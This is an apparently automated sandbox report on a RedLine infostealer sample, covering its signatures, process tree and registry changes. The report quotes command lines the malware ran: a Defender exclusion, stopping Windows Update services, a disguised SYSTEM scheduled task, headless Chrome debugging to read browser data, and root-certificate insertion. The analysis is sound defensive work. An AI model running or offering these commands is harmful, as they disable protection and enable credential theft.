Malware Analysis Report

2025-01-18 09:17

Sample ID 230808-dsf3bsbh2t
Target 4864e1921b46bc11d2358c1985d35cf3.exe
SHA256 5303b4aea2db43e76bad4f1e0a4dfed6a1d7e1b0698d6b20366deee89253a180
Tags
redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5303b4aea2db43e76bad4f1e0a4dfed6a1d7e1b0698d6b20366deee89253a180

Threat Level: Known bad

The file 4864e1921b46bc11d2358c1985d35cf3.exe was found to be: Known bad.

Malicious Activity Summary

redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

Downloads MZ/PE file

Stops running service(s)

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Themida packer

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-08 03:16

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-08 03:16

Reported

2023-08-08 03:18

Platform

win7-20230712-en

Max time kernel

48s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1212 created 1272 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE

Downloads MZ/PE file

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cli.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2020 set thread context of 2612 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2148 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2148 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2148 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2148 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2148 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2148 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2148 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2148 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2148 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2148 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2148 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2148 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 3040 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 3040 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 3040 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 3040 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2020 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2020 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2020 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2020 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2020 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2020 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2020 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2020 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2020 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2020 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2020 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2020 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2020 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2240 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2240 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2240 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2240 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2040 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe

"C:\Users\Admin\AppData\Local\Temp\4864e1921b46bc11d2358c1985d35cf3.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 108

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=54160 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef74e9758,0x7fef74e9768,0x7fef74e9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=824 --field-trial-handle=1000,i,12582465309236691494,10646425831562605586,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1212 --field-trial-handle=1000,i,12582465309236691494,10646425831562605586,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=54160 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1616 --field-trial-handle=1000,i,12582465309236691494,10646425831562605586,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=54160 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1944 --field-trial-handle=1000,i,12582465309236691494,10646425831562605586,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=54160 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2452 --field-trial-handle=1000,i,12582465309236691494,10646425831562605586,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=54160 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2584 --field-trial-handle=1000,i,12582465309236691494,10646425831562605586,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=54160 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2028 --field-trial-handle=1000,i,12582465309236691494,10646425831562605586,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\schtasks.exe

